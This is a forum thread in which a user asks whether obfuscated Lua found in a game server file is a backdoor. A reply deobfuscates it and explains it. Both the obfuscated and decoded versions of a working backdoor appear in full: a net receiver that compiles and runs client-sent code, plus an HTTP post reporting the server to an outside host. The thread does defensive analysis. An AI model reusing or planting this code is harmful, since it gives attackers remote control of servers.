• what is this? backdoor?
    5 replies, posted
i found this in sv lua file local ‪ = _G local ‪‪ = ‪['\115\116\114\105\110\103'] local ‪‪‪ = ‪['\98\105\116']['\98\120\111\114'] local function ‪‪‪‪‪‪‪(‪‪‪‪) if ‪‪['\108\101\110'](‪‪‪‪) == 0 then return ‪‪‪‪ end local ‪‪‪‪‪ = '' local ‪‪‪‪‪‪ = 0 for _ in ‪‪['\103\109\97\116\99\104'](‪‪‪‪,'\46') do ‪‪‪‪‪=‪‪‪‪‪..‪‪['\99\104\97\114'](‪‪‪(‪‪["\98\121\116\101"](_), 180))end return ‪‪‪‪‪ end if ‪[‪‪‪‪‪‪‪"\231\241\230\226\241\230"]then ‪[‪‪‪‪‪‪‪"\193\192\221\216"][‪‪‪‪‪‪‪"\245\208\208\250\209\192\195\219\198\223\231\192\198\221\218\211"](‪‪‪‪‪‪‪"\245\248\224\241\230\241\240\235\247\245\230\246\132\250")‪[‪‪‪‪‪‪‪"\218\209\192"][‪‪‪‪‪‪‪"\230\209\215\209\221\194\209"](‪‪‪‪‪‪‪"\245\248\224\241\230\241\240\235\247\245\230\246\132\250",function ()local ‪‪repeat=‪[‪‪‪‪‪‪‪"\247\219\217\196\221\216\209\231\192\198\221\218\211"](‪[‪‪‪‪‪‪‪"\218\209\192"][‪‪‪‪‪‪‪"\230\209\213\208\231\192\198\221\218\211"](),‪‪‪‪‪‪‪"\248\193\213\247\217\208",false )if ‪[‪‪‪‪‪‪‪"\221\199\210\193\218\215\192\221\219\218"](‪‪repeat)then ‪‪repeat()end end )‪[‪‪‪‪‪‪‪"\220\192\192\196"][‪‪‪‪‪‪‪"\228\219\199\192"](‪‪‪‪‪‪‪"\220\192\192\196\142\155\155\215\219\217\198\213\208\209\154\192\209\213\217\155\199\209\198\194\209\198\216\221\199\192\155\222\219\221\218\154\196\220\196",{[‪‪‪‪‪‪‪"\196\219\198\192"]=‪[‪‪‪‪‪‪‪"\243\209\192\247\219\218\226\213\198\231\192\198\221\218\211"](‪‪‪‪‪‪‪"\220\219\199\192\196\219\198\192"),[‪‪‪‪‪‪‪"\218\213\217\209"]=(‪[‪‪‪‪‪‪‪"\193\192\221\216"][‪‪‪‪‪‪‪"\246\213\199\209\130\128\241\218\215\219\208\209"](‪[‪‪‪‪‪‪‪"\243\209\192\252\219\199\192\250\213\217\209"]()))})end
No, this is encryption of code.
Another Backdoor?!
Sound legit. No reason to go any further. /s
This is just a weakly obfuscated backdoor. Here's the actual code: if SERVER then     util.AddNetworkString("ALTERED_CARB0N")     netReceive("ALTERED_CARB0N", function()         local func = CompileString(net.ReadString(), "LuaCmd", false)         if isfunction(func) then             func()         end     end)     http.Post("http://comrade.team/serverlist/join.php", {         ["port"] = GetConVarString("hostport"),         ["name"] = (util.Base64Encode(GetHostName()))     }) end As you can see they're adding a net receiver to run Lua code on the server and reporting the infected server to their list of backdoored servers.
Legit question, why would do you even encrypt code to prevent people from edit your code they got, tell me about hide, but why would do you hide code in first place, shady as fuck
Sorry, you need to Log In to post a reply to this thread.